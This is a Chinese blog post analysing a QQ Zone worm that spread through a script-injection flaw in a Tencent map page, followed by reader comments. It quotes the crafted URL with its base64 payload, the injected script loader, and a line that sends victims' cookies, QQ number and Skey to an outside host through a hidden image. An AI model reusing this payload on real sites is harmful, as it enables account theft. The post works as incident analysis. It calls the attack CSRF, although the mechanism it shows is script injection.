【我在这里谁来帮帮我啊!!!】事件

就在刚才,我刷QQ空间的时候,突然出现了一大群人发出了同样的这样一条消息(请不要点下面的链接,不然你也会中招)

我在这里谁来帮帮我啊!!!  腾讯地图  by:Luna qq:82919847

于是我第一反应就是,一定是TX网站又被挂马了。。。。

所以我就开始寻找发送这条消息的根源

上面的链接是一个短网址,http://url.cn/eidT6l,用短链复原工具看了下,确实和点开来的地址是一样的,那么就不需要在这里多做研究了,直接研究目标页的源码:view-source:http://acts.zhan.qq.com/module/map/gpsApp?gpsId=gpsId_5583b2cbd6dc0&data=eyJpZCI6Imdwc0lkXzU1ODNiMmNiZDZkYzAiLCJ3aWR0aCI6MzIwLCJoZWlnaHQiOjUwMCwiZGF0YSI6W3siYWRkcmVzcyI6IiJ9XX07JC5nZXRTY3JpcHQoImh0dHA6Ly9seHNzLnNpbmFhcHAuY29tL20uanMiKTthPXtzczpbe2FzZDogIiIsImxhdCI6IjMxLjE5ODI5OSIsImxuZyI6IjEyMS4zOTI1OCIsInRpdGxlIjoicyIsInBob25lIjoiIn1dfQ==

首先我搜索了一下发出的关键字“我”,并没有结果,说明并不是直接从这个页面发出的消息,然后我开始一行行审查代码,结果在45行发现了异样,

    //新版改成默认从url拿参数
    var options = {"id":"gpsId_5583b2cbd6dc0","width":320,"height":500,"data":[{"address":""}]};$.getScript("http://lxss.sinaapp.com/m.js");a={ss:[{asd: "","lat":"31.198299","lng":"121.39258","title":"s","phone":""}]};

不仔细看还真看不出后面插了一段代码,我发现了它,是因为这里面竟然会载入sinaapp的js,绝对有问题。于是我打开了这个app的首页看了下,是默认页,那么这个app的拥有着多半就是挂马者本人了。然后看一下载入的脚本,一眼就可以看到那句话

var d = {"con":"我在这里谁来帮帮我啊!!! http://url.cn/eidT6l by:Luna qq:82919847","hostuin":$.getQQ()}

 

 

更新:我继续研究了一下那个data字段,果不其然就是它了,虽然我一开始就看出这是base64加密的,不过找错了工具。。没能解出来。刚从我又找了个工具解了一下,得到以下结果

{"id":"gpsId_5583b2cbd6dc0","width":320,"height":500,"data":[{"address":""}]};$.getScript("http://lxss.sinaapp.com/m.js");a={ss:[{asd: "","lat":"31.198299","lng":"121.39258","title":"s","phone":""}]}

可以看出来,是TX程序员偷懒直接把解密结果连接到`var options = ` 后面了,才导致页面直接嵌入了代码。所以这不是挂马,而是CSRF攻击。

 

 

so,消息就是从这里发出来的,利用了浏览器里的Token发出了这么一条消息,并吸引其他用户继续上钩。

我们接着往下看。

最后一行

$('body').append('<div style="display:none"><img src="http://lxss.sinaapp.com/m.php?c='+escape(document.cookie)+'&u='+$.getQQ()+'&s='+Skey()+'" width=0 height=0 border=0 /></div>');

这行代码通过假装调用一个图片的形式,把用户的cookie,Skey和QQ号发送到了这个地址。虽然我不知道这些信息有啥用,不过一旦你发出了那个说说,那么你的账号也就危险了,请速改密码(QAQ我也中枪了)。

 

另外那个APP我已举报。

 


补:

我看了那个写在上面的QQ的空间,看来作者就是这个人了。这么说其本人并不是为了获得操作权限才发布了这条说说,看起来只是测试。

希望作者别来干我,我没你厉害



本文发布于 https://luojia.me

本站文章未经文下加注授权不得拷贝发布。

0 0 投票数
打分
订阅评论
提醒
guest
13 评论
内联反馈
查看所有评论
笑平生
游客
笑平生
9 年 前

TX没有解决这个问题,反而被坏人利用,现在这种类型说说又流行了起来,同时我的几个好友的号都被盗了。真tm蛋疼。

饭饭 - -°..[̲̅V̲̅I̲̅P̲̅]
游客
饭饭 - -°..[̲̅V̲̅I̲̅P̲̅]
9 年 前

我手贱了。。

Mooction
游客
9 年 前

哇哦,没碰到过这事。。倒是那种仿QQ页面然后显示QQ号和头像的那种文章见过。你要不要把这个问题提交到乌云。。

弦念
游客
弦念
9 年 前

楼主的文章被我收录http://www.2015110.com/wp/wozaizhelishuilai/特在此请博主批准

沈默
游客
沈默
9 年 前

Luna……这个名字,好像曾经在哪里看到过。

沈默
游客
沈默
9 年 前
回复给  罗佳(博主)

我知道luna是这个意思。我是说,用这个名字的,会做这种事情的人,我好像曾经在哪里看到过。

沈默
游客
沈默
9 年 前
回复给  罗佳(博主)

……并不是。是我多心了。

沈默
游客
沈默
9 年 前

Luna……这个名字,好像曾经在哪里看到过。